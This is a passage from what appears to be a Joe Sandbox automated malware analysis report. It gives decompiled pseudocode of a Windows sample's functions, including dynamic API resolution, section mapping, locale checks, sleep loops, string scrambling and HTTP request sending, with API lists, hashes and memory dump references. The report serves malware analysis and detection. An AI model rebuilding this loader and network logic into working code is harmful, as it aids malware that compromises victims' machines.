											goto L8;
										} else {
											 *_a16 = _t56;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}












          0x00401210
          0x00401214
          0x004012d5
          0x0040121a
          0x00401232
          0x00401241
          0x00401248
          0x0040124a
          0x0040124f
          0x004012cd
          0x004012ce
          0x00401251
          0x0040125e
          0x00401260
          0x00401265
          0x00000000
          0x00401267
          0x00401274
          0x00401276
          0x0040127b
          0x00000000
          0x0040127d
          0x0040128a
          0x0040128c
          0x00401291
          0x00000000
          0x00401293
          0x004012a0
          0x004012a2
          0x004012a7
          0x00000000
          0x004012a9
          0x004012af
          0x004012b5
          0x004012ba
          0x004012bf
          0x004012c4
          0x00000000
          0x004012c6
          0x004012c9
          0x004012c9
          0x004012c4
          0x004012a7
          0x00401291
          0x0040127b
          0x00401265
          0x0040124f
          0x004012e3

          APIs
            • Part of subcall function 004012E6: RtlAllocateHeap.NTDLL(00000000,?,00401A18,00000030,?,00000000), ref: 004012F2
          • GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,00401337,?,?,?,?,?,00000002,?,?), ref: 00401226
          • GetProcAddress.KERNEL32(00000000,?), ref: 00401248
          • GetProcAddress.KERNEL32(00000000,?), ref: 0040125E
          • GetProcAddress.KERNEL32(00000000,?), ref: 00401274
          • GetProcAddress.KERNEL32(00000000,?), ref: 0040128A
          • GetProcAddress.KERNEL32(00000000,?), ref: 004012A0
            • Part of subcall function 0040110B: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74714EE0,00000000,00000000,?), ref: 00401168
            • Part of subcall function 0040110B: memset.NTDLL ref: 0040118A
          Memory Dump Source
          • Source File: 00000000.00000002.580483251.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.580483251.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.580483251.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.580483251.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_server_(3).jbxd
          Similarity
          • API ID: AddressProc$AllocateCreateHandleHeapModuleSectionmemset
          • String ID:
          • API String ID: 3012371009-0
          • Opcode ID: ef3fb27e8fef4e2a0636531737cea3558674998f5155fbc55e035b1692bada1c
          • Instruction ID: f32f865edd81f5c961b11f374a2ae16c892bfa44bfba4a474c1bfb8eea8db87f
          • Opcode Fuzzy Hash: ef3fb27e8fef4e2a0636531737cea3558674998f5155fbc55e035b1692bada1c
          • Instruction Fuzzy Hash: 7C210CB4A0060BAFD710DFA9CD4495B77ECEB54314700447AEA09FB261EB74E9008B68
          Uniqueness

          Uniqueness Score: -1.00%

          Function 005E51D8 Relevance: 9.0, APIs: 6, Instructions: 45networkCOMMON
          Download Yara Rule
          C-Code - Quality: 100%
          			E005E51D8(void* __eax, intOrPtr _a4, intOrPtr _a8) {
				void* __esi;
				long _t10;
				void* _t18;
				void* _t22;

				_t9 = __eax;
				_t22 = __eax;
				if(_a4 != 0 && E005E2058(__eax + 4, _t18, _a4, __eax, __eax + 4) == 0) {
					L9:
					return GetLastError();
				}
				_t10 = E005E7B83(_t9, _t18, _t22, _a8); // executed
				if(_t10 == 0) {
					ResetEvent( *(_t22 + 0x1c));
					ResetEvent( *(_t22 + 0x20));
					if(HttpSendRequestA( *(_t22 + 0x18), 0, 0xffffffff, 0, 0) != 0) {
						SetEvent( *(_t22 + 0x1c));
						goto L7;
					} else {
						_t10 = GetLastError();
						if(_t10 == 0x3e5) {
							L7:
							_t10 = 0;
						}
					}
				}
				if(_t10 == 0xffffffff) {
					goto L9;
				}
				return _t10;
			}







          0x005e51d8
          0x005e51e5
          0x005e51e7
          0x005e524a
          0x00000000
          0x005e524a
          0x005e51ff
          0x005e5206
          0x005e5212
          0x005e5217
          0x005e522d
          0x005e523d
          0x00000000
          0x005e522f
          0x005e522f
          0x005e5236
          0x005e5243
          0x005e5243
          0x005e5243
          0x005e5236
          0x005e522d
          0x005e5248
          0x00000000
          0x00000000
          0x005e524e

          APIs
          • ResetEvent.KERNEL32(?,00000008,?,?,00000102,005E21E7,?,?,747581D0,00000000), ref: 005E5212
          • ResetEvent.KERNEL32(?), ref: 005E5217
          • HttpSendRequestA.WININET(?,00000000,000000FF,00000000,00000000), ref: 005E5224
          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,005E3F34,00000000,?,?), ref: 005E522F
          • GetLastError.KERNEL32(?,?,00000102,005E21E7,?,?,747581D0,00000000), ref: 005E524A
            • Part of subcall function 005E2058: lstrlen.KERNEL32(00000000,00000008,?,74714D40,?,?,005E51F7,?,?,?,?,00000102,005E21E7,?,?,747581D0), ref: 005E2064
            • Part of subcall function 005E2058: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,005E51F7,?,?,?,?,00000102,005E21E7,?), ref: 005E20C2
            • Part of subcall function 005E2058: lstrcpy.KERNEL32(00000000,00000000), ref: 005E20D2
          • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,005E3F34,00000000,?), ref: 005E523D
          Memory Dump Source
          • Source File: 00000000.00000002.580662493.00000000005E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 005E0000, based on PE: true
          • Associated: 00000000.00000002.580658299.00000000005E0000.00000004.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580668636.00000000005E9000.00000002.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580672954.00000000005EA000.00000004.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580678713.00000000005EC000.00000002.10000000.00040000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_5e0000_server_(3).jbxd
          Similarity
          • API ID: Event$ErrorLastReset$HttpRequestSendlstrcpylstrlenmemcpy
          • String ID:
          • API String ID: 3739416942-0
          • Opcode ID: 84242a4c122968e350fa86b86d1eafa65a3315146c692983a0b974a3fbd781e3
          • Instruction ID: f00249f4dac721dd37ec707f869359d7f201055e9f27fd37d6c14533a44263c1
          • Opcode Fuzzy Hash: 84242a4c122968e350fa86b86d1eafa65a3315146c692983a0b974a3fbd781e3
          • Instruction Fuzzy Hash: 8B016235100691AAD7396B72DC48F5B7FA9BF58368F100A25F6D1D10E0E720E804E621
          Uniqueness

          Uniqueness Score: -1.00%

          Function 005E5364 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 29sleepmemoryCOMMON
          Download Yara Rule
          C-Code - Quality: 50%
          			E005E5364(void** __esi) {
				intOrPtr _v0;
				intOrPtr _t4;
				intOrPtr _t6;
				void* _t8;
				void* _t9;
				intOrPtr _t10;
				void* _t11;
				void** _t13;

				_t13 = __esi;
				_t4 =  *0x5ea3cc; // 0x2bc9600
				__imp__(_t4 + 0x40);
				while(1) {
					_t6 =  *0x5ea3cc; // 0x2bc9600
					_t1 = _t6 + 0x58; // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t8 =  *_t13;
				if(_t8 != 0 && _t8 != 0x5ea030) {
					HeapFree( *0x5ea2d8, 0, _t8);
				}
				_t9 = E005E12C6(_v0, _t13); // executed
				_t13[1] = _t9;
				_t10 =  *0x5ea3cc; // 0x2bc9600
				_t11 = _t10 + 0x40;
				__imp__(_t11);
				return _t11;
			}











          0x005e5364
          0x005e5364
          0x005e536d
          0x005e537d
          0x005e537d
          0x005e5382
          0x005e5387
          0x00000000
          0x00000000
          0x005e5377
          0x005e5377
          0x005e5389
          0x005e538d
          0x005e539f
          0x005e539f
          0x005e53aa
          0x005e53af
          0x005e53b2
          0x005e53b7
          0x005e53bb
          0x005e53c1

          APIs
          • RtlEnterCriticalSection.NTDLL(02BC95C0), ref: 005E536D
          • Sleep.KERNEL32(0000000A), ref: 005E5377
          • HeapFree.KERNEL32(00000000,00000000), ref: 005E539F
          • RtlLeaveCriticalSection.NTDLL(02BC95C0), ref: 005E53BB
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.580662493.00000000005E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 005E0000, based on PE: true
          • Associated: 00000000.00000002.580658299.00000000005E0000.00000004.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580668636.00000000005E9000.00000002.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580672954.00000000005EA000.00000004.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580678713.00000000005EC000.00000002.10000000.00040000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_5e0000_server_(3).jbxd
          Similarity
          • API ID: CriticalSection$EnterFreeHeapLeaveSleep
          • String ID: Uqt
          • API String ID: 58946197-2320327147
          • Opcode ID: 771ab01aa9ce801a35d8f48db5d6636f7cc8db0099d5742d901bd6d5899f4981
          • Instruction ID: 75b02d4a2fd7cda202f85ea6429cfce01829a1c9c0b2d325b3eed49daef9ffe8
          • Opcode Fuzzy Hash: 771ab01aa9ce801a35d8f48db5d6636f7cc8db0099d5742d901bd6d5899f4981
          • Instruction Fuzzy Hash: 2CF0DA716006C19BEB2C9F76DC8CB567FE4AB68384B144814B5C1DA271D670E858EB26
          Uniqueness

          Uniqueness Score: -1.00%

          Function 005E2523 Relevance: 7.7, APIs: 5, Instructions: 161memoryCOMMON
          Download Yara Rule
          C-Code - Quality: 59%
          			E005E2523(signed int __edx) {
				signed int _v8;
				long _v12;
				CHAR* _v16;
				long _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t21;
				CHAR* _t22;
				CHAR* _t25;
				intOrPtr _t26;
				void* _t27;
				void* _t31;
				intOrPtr _t32;
				void* _t33;
				CHAR* _t37;
				CHAR* _t43;
				CHAR* _t44;
				CHAR* _t45;
				void* _t50;
				void* _t52;
				signed char _t57;
				intOrPtr _t59;
				signed int _t60;
				void* _t64;
				CHAR* _t68;
				CHAR* _t69;
				char* _t70;
				void* _t71;

				_t62 = __edx;
				_v20 = 0;
				_v8 = 0;
				_v12 = 0;
				_t21 = E005E4520();
				if(_t21 != 0) {
					_t60 =  *0x5ea2fc; // 0x2000000a
					_t56 = (_t60 & 0xf0000000) + _t21;
					 *0x5ea2fc = (_t60 & 0xf0000000) + _t21;
				}
				_t22 =  *0x5ea178(0, 2); // executed
				_v16 = _t22;
				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
					_t25 = E005E3037( &_v8,  &_v20); // executed
					_t55 = _t25;
					_t26 =  *0x5ea348; // 0x25dd5a8
					if( *0x5ea2fc > 5) {
						_t8 = _t26 + 0x5eb51d; // 0x4d283a53
						_t27 = _t8;
					} else {
						_t7 = _t26 + 0x5eb9db; // 0x44283a44
						_t27 = _t7;
					}
					E005E4332(_t27, _t27);
					_t31 = E005E415A(_t62,  &_v20,  &_v12); // executed
					if(_t31 == 0) {
						CloseHandle(_v20);
					}
					_t64 = 5;
					if(_t55 != _t64) {
						_t32 = E005E27A0();
						 *0x5ea310 =  *0x5ea310 ^ 0x81bbe65d;
						 *0x5ea36c = _t32;
						_t33 = E005E33DC(0x60);
						 *0x5ea3cc = _t33;
						__eflags = _t33;
						if(_t33 == 0) {
							_push(8);
							_pop(0);
						} else {
							memset(_t33, 0, 0x60);
							_t50 =  *0x5ea3cc; // 0x2bc9600
							_t71 = _t71 + 0xc;
							__imp__(_t50 + 0x40);
							_t52 =  *0x5ea3cc; // 0x2bc9600
							 *_t52 = 0x5eb142;
						}
						_t55 = 0;
						__eflags = 0;
						if(0 == 0) {
							_t37 = RtlAllocateHeap( *0x5ea2d8, 0, 0x43);
							 *0x5ea368 = _t37;
							__eflags = _t37;
							if(_t37 == 0) {
								_push(8);
								_pop(0);
							} else {
								_t57 =  *0x5ea2fc; // 0x2000000a
								_t62 = _t57 & 0x000000ff;
								_t59 =  *0x5ea348; // 0x25dd5a8
								_t13 = _t59 + 0x5eb74a; // 0x697a6f4d
								_t56 = _t13;
								wsprintfA(_t37, _t13, _t57 & 0x000000ff, _t57 & 0x000000ff, 0x5e927b);
							}
							_t55 = 0;
							__eflags = 0;
							if(0 == 0) {
								asm("sbb eax, eax");
								E005E3BD3( ~_v8 &  *0x5ea310, 0x5ea00c); // executed
								_t43 = E005E1D8A(0, _t56, _t62, _t64, 0x5ea00c); // executed
								_t55 = _t43;
								__eflags = _t55;
								if(_t55 != 0) {
									goto L30;
								}
								_t44 = E005E6EA3(_t62); // executed
								__eflags = _t44;
								if(_t44 != 0) {
									__eflags = _v8;
									_t68 = _v12;
									if(_v8 != 0) {
										L29:
										_t45 = E005E6815(_t62, _t68, _v8); // executed
										_t55 = _t45;
										goto L30;
									}
									__eflags = _t68;
									if(__eflags == 0) {
										goto L30;
									}
									_t55 = E005E5C31(__eflags,  &(_t68[4]));
									__eflags = _t55;
									if(_t55 == 0) {
										goto L30;
									}
									goto L29;
								}
								_t55 = 8;
							}
						}
					} else {
						_t69 = _v12;
						if(_t69 == 0) {
							L30:
							if(_v16 == 0 || _v16 == 1) {
								 *0x5ea17c();
							}
							goto L34;
						}
						_t70 =  &(_t69[4]);
						do {
						} while (E005E23C4(_t64, _t70, 0, 1) == 0x4c7);
					}
					goto L30;
				} else {
					_t55 = _t22;
					L34:
					return _t55;
				}
			}
































          0x005e2523
          0x005e252d
          0x005e2530
          0x005e2533
          0x005e2536
          0x005e253d
          0x005e253f
          0x005e254b
          0x005e254d
          0x005e254d
          0x005e2556
          0x005e255c
          0x005e2561
          0x005e257b
          0x005e2587
          0x005e2589
          0x005e258e
          0x005e2598
          0x005e2598
          0x005e2590
          0x005e2590
          0x005e2590
          0x005e2590
          0x005e259f
          0x005e25ac
          0x005e25b3
          0x005e25b8
          0x005e25b8
          0x005e25c1
          0x005e25c4
          0x005e25ea
          0x005e25ef
          0x005e25fb
          0x005e2600
          0x005e2605
          0x005e260a
          0x005e260c
          0x005e2638
          0x005e263a
          0x005e260e
          0x005e2612
          0x005e2617
          0x005e261c
          0x005e2623
          0x005e2629
          0x005e262e
          0x005e2634
          0x005e263b
          0x005e263d
          0x005e263f
          0x005e264e
          0x005e2654
          0x005e2659
          0x005e265b
          0x005e268b
          0x005e268d
          0x005e265d
          0x005e265d
          0x005e2663
          0x005e2670
          0x005e2676
          0x005e2676
          0x005e267e
          0x005e2687
          0x005e268e
          0x005e2690
          0x005e2692
          0x005e2699
          0x005e26a6
          0x005e26ab
          0x005e26b0
          0x005e26b2
          0x005e26b4
          0x00000000
          0x00000000
          0x005e26b6
          0x005e26bb
          0x005e26bd
          0x005e26c4
          0x005e26c8
          0x005e26cb
          0x005e26e0
          0x005e26e4
          0x005e26e9
          0x00000000
          0x005e26e9
          0x005e26cd
          0x005e26cf
          0x00000000
          0x00000000
          0x005e26da
          0x005e26dc
          0x005e26de
          0x00000000
          0x00000000
          0x00000000
          0x005e26de
          0x005e26c1
          0x005e26c1
          0x005e2692
          0x005e25c6
          0x005e25c6
          0x005e25cb
          0x005e26eb
          0x005e26f0
          0x005e26f8
          0x005e26f8
          0x00000000
          0x005e26f0
          0x005e25d1
          0x005e25d4
          0x005e25de
          0x005e25e5
          0x00000000
          0x005e2700
          0x005e2700
          0x005e2703
          0x005e2707
          0x005e2707

          APIs
            • Part of subcall function 005E4520: GetModuleHandleA.KERNEL32(4C44544E,00000000,005E253B,00000001), ref: 005E452F
          • CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 005E25B8
            • Part of subcall function 005E27A0: GetVersionExA.KERNEL32(?,00000042,00000000), ref: 005E27C4
            • Part of subcall function 005E27A0: wsprintfA.USER32 ref: 005E2828
            • Part of subcall function 005E33DC: RtlAllocateHeap.NTDLL(00000000,00000000,005E62F6), ref: 005E33E8
          • memset.NTDLL ref: 005E2612
          • RtlInitializeCriticalSection.NTDLL(02BC95C0), ref: 005E2623
            • Part of subcall function 005E5C31: memset.NTDLL ref: 005E5C4B
            • Part of subcall function 005E5C31: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 005E5C91
            • Part of subcall function 005E5C31: StrCmpNIW.SHLWAPI(00000000,?,00000000), ref: 005E5C9C
          • RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 005E264E
          • wsprintfA.USER32 ref: 005E267E
          Memory Dump Source
          • Source File: 00000000.00000002.580662493.00000000005E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 005E0000, based on PE: true
          • Associated: 00000000.00000002.580658299.00000000005E0000.00000004.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580668636.00000000005E9000.00000002.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580672954.00000000005EA000.00000004.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580678713.00000000005EC000.00000002.10000000.00040000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_5e0000_server_(3).jbxd
          Similarity
          • API ID: AllocateHandleHeapmemsetwsprintf$CloseCriticalInitializeModuleSectionVersionlstrlen
          • String ID:
          • API String ID: 1825273115-0
          • Opcode ID: 2bb551caab567597024eaf8929a4495b904f581d97ffbf1c84e8b1cf4a74fc6d
          • Instruction ID: f4af4bcd784e2e5ab66b082e2b1a2f92b0940d321477351ead513a882422d632
          • Opcode Fuzzy Hash: 2bb551caab567597024eaf8929a4495b904f581d97ffbf1c84e8b1cf4a74fc6d
          • Instruction Fuzzy Hash: 1E511A71A002D5ABDB1CDBB2DDC9B6E3FACBB68700F100816F1C2EB155DB70AA449B51
          Uniqueness

          Uniqueness Score: -1.00%

          Function 005E7040 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 145stringCOMMON
          Download Yara Rule
          C-Code - Quality: 22%
          			E005E7040(signed int __eax, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				intOrPtr _t81;
				char _t83;
				signed int _t90;
				signed int _t97;
				signed int _t99;
				char _t101;
				unsigned int _t102;
				intOrPtr _t103;
				char* _t107;
				signed int _t110;
				signed int _t113;
				signed int _t118;
				signed int _t122;
				intOrPtr _t124;

				_t102 = _a8;
				_t118 = 0;
				_v20 = __eax;
				_t122 = (_t102 >> 2) + 1;
				_v8 = 0;
				_a8 = 0;
				_t81 = E005E33DC(_t122 << 2);
				_v16 = _t81;
				if(_t81 == 0) {
					_push(8);
					_pop(0);
					L37:
					return 0;
				}
				_t107 = _a4;
				_a4 = _t102;
				_t113 = 0;
				while(1) {
					_t83 =  *_t107;
					if(_t83 == 0) {
						break;
					}
					if(_t83 == 0xd || _t83 == 0xa) {
						if(_t118 != 0) {
							if(_t118 > _v8) {
								_v8 = _t118;
							}
							_a8 = _a8 + 1;
							_t118 = 0;
						}
						 *_t107 = 0;
						goto L16;
					} else {
						if(_t118 != 0) {
							L10:
							_t118 = _t118 + 1;
							L16:
							_t107 = _t107 + 1;
							_t15 =  &_a4;
							 *_t15 = _a4 - 1;
							if( *_t15 != 0) {
								continue;
							}
							break;
						}
						if(_t113 == _t122) {
							L21:
							if(_a8 <= 0x20) {
								_push(0xb);
								L34:
								_pop(0);
								L35:
								E005E61DA(_v16);
								goto L37;
							}
							_t24 = _v8 + 5; // 0xcdd8d2f8
							_t103 = E005E33DC((_v8 + _t24) * _a8 + 4);
							if(_t103 == 0) {
								_push(8);
								goto L34;
							}
							_t90 = _a8;
							_a4 = _a4 & 0x00000000;
							_v8 = _v8 & 0x00000000;
							_t124 = _t103 + _t90 * 4;
							if(_t90 <= 0) {
								L31:
								 *0x5ea318 = _t103;
								goto L35;
							}
							do {
								_t110 = 0x3c6ef35f + _v20 * 0x19660d;
								_v20 = 0x3c6ef35f + _t110 * 0x19660d;
								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4)));
								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4)));
								_v12 = _v12 & 0x00000000;
								if(_a4 <= 0) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t99 = _v12;
									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124); // executed
									if(_t99 == 0) {
										break;
									}
									_v12 = _v12 + 1;
									if(_v12 < _a4) {
										continue;
									}
									goto L30;
								}
								_v8 = _v8 - 1;
								L30:
								_t97 = _a4;
								_a4 = _a4 + 1;
								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124;
								__imp__(_t124);
								_v8 = _v8 + 1;
								_t124 = _t124 + _t97 + 1;
							} while (_v8 < _a8);
							goto L31;
						}
						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107;
						_t101 = _t83;
						if(_t83 - 0x61 <= 0x19) {
							_t101 = _t101 - 0x20;
						}
						 *_t107 = _t101;
						_t113 = _t113 + 1;
						goto L10;
					}
				}
				if(_t118 != 0) {
					if(_t118 > _v8) {
						_v8 = _t118;
					}
					_a8 = _a8 + 1;
				}
				goto L21;
			}





















          0x005e7047
          0x005e704e
          0x005e7053
          0x005e7056
          0x005e705d
          0x005e7060
          0x005e7063
          0x005e7068
          0x005e706d
          0x005e71c1
          0x005e71c3
          0x005e71c5
          0x005e71ca
          0x005e71ca
          0x005e7073
          0x005e7076
          0x005e7079
          0x005e707b
          0x005e707b
          0x005e707f
          0x00000000
          0x00000000
          0x005e7083
          0x005e70af
          0x005e70b4
          0x005e70b6
          0x005e70b6
          0x005e70b9
          0x005e70bc
          0x005e70bc
          0x005e70be
          0x00000000
          0x005e7089
          0x005e708b
          0x005e70aa
          0x005e70aa
          0x005e70c1
          0x005e70c1
          0x005e70c2
          0x005e70c2
          0x005e70c5
          0x00000000
          0x00000000
          0x00000000
          0x005e70c5
          0x005e708f
          0x005e70d6
          0x005e70da
          0x005e71b4
          0x005e71b6
          0x005e71b6
          0x005e71b7
          0x005e71ba
          0x00000000
          0x005e71ba
          0x005e70e3
          0x005e70f4
          0x005e70f8
          0x005e71b0
          0x00000000
          0x005e71b0
          0x005e70fe
          0x005e7101
          0x005e7105
          0x005e7109
          0x005e710e
          0x005e71a6
          0x005e71a6
          0x00000000
          0x005e71ac
          0x005e7119
          0x005e7122
          0x005e7136
          0x005e713d
          0x005e7152
          0x005e7158
          0x005e7160
          0x00000000
          0x00000000
          0x00000000
          0x00000000
          0x005e7162
          0x005e7162
          0x005e7162
          0x005e7169
          0x005e7171
          0x00000000
          0x00000000
          0x005e7173
          0x005e717c
          0x00000000
          0x00000000
          0x00000000
          0x005e717e
          0x005e7180
          0x005e7183
          0x005e7183
          0x005e7186
          0x005e718a
          0x005e718d
          0x005e7193
          0x005e7196
          0x005e719d
          0x00000000
          0x005e7119
          0x005e7094
          0x005e709c
          0x005e70a2
          0x005e70a4
          0x005e70a4
          0x005e70a7
          0x005e70a9
          0x00000000
          0x005e70a9
          0x005e7083
          0x005e70c9
          0x005e70ce
          0x005e70d0
          0x005e70d0
          0x005e70d3
          0x005e70d3
          0x00000000

          APIs
            • Part of subcall function 005E33DC: RtlAllocateHeap.NTDLL(00000000,00000000,005E62F6), ref: 005E33E8
          • lstrcpy.KERNEL32(43175AC4,00000020), ref: 005E713D
          • lstrcat.KERNEL32(43175AC4,00000020), ref: 005E7152
          • lstrcmp.KERNEL32(00000000,43175AC4), ref: 005E7169
          • lstrlen.KERNEL32(43175AC4), ref: 005E718D
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.580662493.00000000005E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 005E0000, based on PE: true
          • Associated: 00000000.00000002.580658299.00000000005E0000.00000004.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580668636.00000000005E9000.00000002.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580672954.00000000005EA000.00000004.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580678713.00000000005EC000.00000002.10000000.00040000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_5e0000_server_(3).jbxd
          Similarity
          • API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
          • String ID:
          • API String ID: 3214092121-3916222277
          • Opcode ID: 42ed2079dbea38f61ad4f0fda1ce2f99244534697297473aa78dca4c4970e407
          • Instruction ID: b8782bcfb9b28c52d0932bd3e091ef5f722ba04323f580f57982375b9f1384a5
          • Opcode Fuzzy Hash: 42ed2079dbea38f61ad4f0fda1ce2f99244534697297473aa78dca4c4970e407
          • Instruction Fuzzy Hash: 8E51C371A0424CEFDF19DF9AC8886ADBFB6FF59350F14805AE8959B201C7709A01CF90
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00401DE1 Relevance: 7.5, APIs: 5, Instructions: 19memoryCOMMON
          Download Yara Rule
          C-Code - Quality: 100%
          			_entry_() {
				void* _t1;
				int _t4;
				int _t6;

				_t6 = 0;
				_t1 = HeapCreate(0, 0x400000, 0); // executed
				 *0x404160 = _t1;
				if(_t1 != 0) {
					 *0x404170 = GetModuleHandleA(0);
					GetCommandLineW(); // executed
					_t4 = E004019F1(); // executed
					_t6 = _t4;
					HeapDestroy( *0x404160);
				}
				ExitProcess(_t6);
			}






          0x00401de2
          0x00401deb
          0x00401df1
          0x00401df8
          0x00401e01
          0x00401e06
          0x00401e0c
          0x00401e17
          0x00401e19
          0x00401e19
          0x00401e20

          APIs
          • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 00401DEB
          • GetModuleHandleA.KERNEL32(00000000), ref: 00401DFB
          • GetCommandLineW.KERNEL32 ref: 00401E06
            • Part of subcall function 004019F1: NtQuerySystemInformation.NTDLL(00000008,00000000,00000030,?), ref: 00401A26
            • Part of subcall function 004019F1: Sleep.KERNELBASE(00000000,00000000,00000030,?,00000000), ref: 00401A6D
            • Part of subcall function 004019F1: GetLocaleInfoA.KERNELBASE(00000400,0000005A,?,00000004,?,00000000), ref: 00401A95
            • Part of subcall function 004019F1: GetSystemDefaultUILanguage.KERNEL32(?,00000000), ref: 00401A9F
            • Part of subcall function 004019F1: VerLanguageNameA.KERNEL32(?,?,00000004,?,00000000), ref: 00401AB2
            • Part of subcall function 004019F1: GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 00401ADF
            • Part of subcall function 004019F1: GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 00401AFD
          • HeapDestroy.KERNEL32 ref: 00401E19
          • ExitProcess.KERNEL32 ref: 00401E20
          Memory Dump Source
          • Source File: 00000000.00000002.580483251.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.580483251.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.580483251.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.580483251.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_server_(3).jbxd
          Similarity
          • API ID: Name$HeapLanguageLongPathSystem$CommandCreateDefaultDestroyExitHandleInfoInformationLineLocaleModuleProcessQuerySleep
          • String ID:
          • API String ID: 1863574965-0
          • Opcode ID: 3f0d5e8033645e4078616d0e82c2d440b95647ac6ba795ba13239d20948eddaa
          • Instruction ID: 5d9c3f05f0f46dd7afa9dd855db83e90556071015df760abc973ca805bcb04d9
          • Opcode Fuzzy Hash: 3f0d5e8033645e4078616d0e82c2d440b95647ac6ba795ba13239d20948eddaa
          • Instruction Fuzzy Hash: 0BE0B6B1403220ABC7116F71BE0CA4F7E28BB89B527000539FA05F2279CB384A41CADC
          Uniqueness

          Uniqueness Score: -1.00%

          Function 005C0005 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 226memoryCOMMON
          Download Yara Rule
          APIs
          • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 005C024D
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.580647391.00000000005C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005C0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_5c0000_server_(3).jbxd
          Yara matches
          Similarity
          • API ID: AllocVirtual
          • String ID: cess$kernel32.dll
          • API String ID: 4275171209-1230238691
          • Opcode ID: 6bdfaac6897b95ce373e99708c469e13dbd82992d17ba98ec564c2ec7f351265
          • Instruction ID: 3c435322ba15a64dfb8888bff5033413b305ca36898837a74b38d840fb54a547
          • Opcode Fuzzy Hash: 6bdfaac6897b95ce373e99708c469e13dbd82992d17ba98ec564c2ec7f351265
          • Instruction Fuzzy Hash: 46C1AAB5D00228EFDF60CFA8D985BADBBB5BF08304F108099E54CA7252DB319A94DF11
          Uniqueness

          Uniqueness Score: -1.00%

          Function 005E5251 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 94memoryCOMMON
          Download Yara Rule
          C-Code - Quality: 100%
          			E005E5251(void* __edx) {
				void* _v8;
				int _v12;
				WCHAR* _v16;
				void* __edi;
				void* __esi;
				void* _t23;
				intOrPtr _t24;
				void* _t26;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t38;
				intOrPtr _t42;
				void* _t45;
				void* _t50;
				void* _t52;

				_t50 = __edx;
				_v12 = 0;
				_t23 = E005E6ADC(0,  &_v8); // executed
				if(_t23 != 0) {
					_v8 = 0;
				}
				_t24 =  *0x5ea348; // 0x25dd5a8
				_t4 = _t24 + 0x5ebc70; // 0x2bc9218
				_t5 = _t24 + 0x5ebb60; // 0x4f0053
				_t26 = E005E33F1( &_v16, _v8, _t5, _t4); // executed
				_t45 = _t26;
				if(_t45 == 0) {
